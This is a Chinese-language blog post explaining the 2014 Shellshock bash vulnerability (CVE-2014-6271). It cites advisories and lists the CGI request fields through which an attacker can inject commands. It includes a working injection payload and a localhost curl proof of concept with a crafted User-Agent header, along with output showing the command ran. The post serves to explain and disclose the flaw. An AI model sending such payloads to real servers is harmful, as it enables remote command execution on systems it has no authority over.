詳細可以參考這篇文章:http://seclists.org/oss-sec/2014/q3/650
其中提到
The vulnerability occurs because
bash does not stop after processing the function definition; it
continues to parse and execute shell commands following the function
definition.
例如
VAR=() { ignored; }; /bin/id會執行後面的 /bin/id
最令人在意的是該如何透過HTTP對這個漏洞進行攻擊
這個攻擊目前看起來只會適用於 CGI scripts 的伺服器有效果
一般而言發送一個 HTTP Request 給 CGI 後,會被 Apache httpd map 成環境變數
一個正常的 Request 長成下面這樣
GET /path?query-param-name=query-param-value HTTP/1.1 Host: www.example.com Custom: custom-header-value
因此可以藉由下面的方法進行攻擊
* Host (“www.example.com”, as REMOTE_HOST) * Header value (“custom-header-value”, as HTTP_CUSTOM in this example) * Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)
另外也可以透過 SSH 的方式進行攻擊
參考:http://seclists.org/oss-sec/2014/q3/651
其他參考資料
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
攻擊方法實例
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]# tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]# ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa
[root@host cgi-bin]# sestatus
SELinux status: enabled
[root@host cgi-bin]# yum update
No comments:
Post a Comment